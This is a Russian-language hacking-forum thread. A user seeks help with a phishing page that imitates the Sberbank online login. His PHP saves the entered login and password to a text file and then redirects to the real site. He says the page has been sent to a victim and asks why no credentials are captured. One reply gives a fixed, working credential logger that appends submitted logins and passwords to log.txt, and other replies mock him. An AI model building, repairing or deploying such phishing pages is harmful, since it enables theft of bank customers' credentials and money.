вот php он в папку вместо лог и пас пишет : кроме них нечиго помогите!!! <input id="login" type="text" class="customPlaceholder csaRegistration" name="field(login)" maxlength="30" title="Идентификатор или логин" tabindex="11"/> <div id="passBlock"> <?php $Pass = $_POST["password"]; ?> <span id="passText" onclick='$("#password").focus();'>Пароль</span> <input id="password" type="password" maxlength="30" onfocus="focusPassword();" onblur="blurPassword();" tabindex="12"/> </div> <? $log = fopen("datasber.txt", "at"); fwrite($log, "\n $Log:$Pass \n"); fclose($log); echo '<html><head><META HTTP-EQUIV="Refresh" content ="0"; URL="https://online.sberbank.ru/CSAFront/index.do/na/"></head></html>'; нужен кто то серьезный кнопарь на кибере так не кто и не ответил мне за 3 дня лохо коороче
дак понятно что отправить короче подругому я ее отправляю терпила открывает но там вместо данных просто : нет ни логина не пароля Добавлено спустя 1 минуту 12 секунд: ну всм в папке которую я прописал в пхп нет данных а таак все работает Добавлено спустя 6 минут 16 секунд: ну что есть здесть людь нормальный кто поможет юнному хакеру а то этот вопрос спать не даёт мне вообще Добавлено спустя 25 секунд: ну что есть здесть людь нормальный кто поможет юнному хакеру а то этот вопрос спать не даёт мне вообще Добавлено спустя 8 минут 38 секунд: и пожайлуста не надо банальности в стиле : как говорил мой дед я твой дед
я вежлив до не возможности Добавлено спустя 2 минуты 3 секунды: мне нужен результат ! чтоб мне помог нормальный чел которого я бы потом вспоминал хорошим словом а не чер.... кокойненить мне башку еб.... может резко и грубо но вот так Добавлено спустя 1 минуту 19 секунд: и не чо не сделаеш спроси у любого начинающего он подтвердит что так !! вопрос--ответ.. все не чо сиси мять!!
Загляни в логи. Начни отлаживать, ты же хакер. http://mp3vega.com/?string=%CF%EE%F1%E2%FF%F9%E0%E5%F2%F1%F ... 0%E0%EC%E8. Бугага, расти.
а что если изменить путь, чтобы данные отправлялись не на оригинальный сайт, а на твой хостинг с обработчиком я прав ? Добавлено спустя 38 секунд: тока смотрел найти не могу!
чеславие пацаны или бабы кто вы там греххх Добавлено спустя 1 минуту 45 секунд: нет я хочу что вы мне помогли сбер фейк тренеровочный просто говорят что трудно его отладить на кибере так не кто и не помог зачем мне наеб дело в знаниях Добавлено спустя 1 минуту 49 секунд: этим феком не ково не наебещ он вообще лоховской . мне нужны знания Добавлено спустя 16 минут 27 секунд: ааа ну я похоже понял тут тоже мудозвоны сидят ? или все таки нормальные парни которые помогу разобраться а не орут что пора на рельсы прыгать!!
Код (PHP): <?php if (isset($_POST['login'])) { file_put_contents('log.txt', "{$_POST['login']} {$_POST['pass']}\r\n", FILE_APPEND); } ?> <form method="POST"> Login <input name="login"> Password <input name="pass"><input type="submit"> </form>
Братюня, слы, атвичаю, крутая книга кароч, памагла мне ваще чотко в свое время осознать что к чему ваще в этом мире. Раскури, проникнешься, а потом уже и приходи, пабалакаем на равных, чо.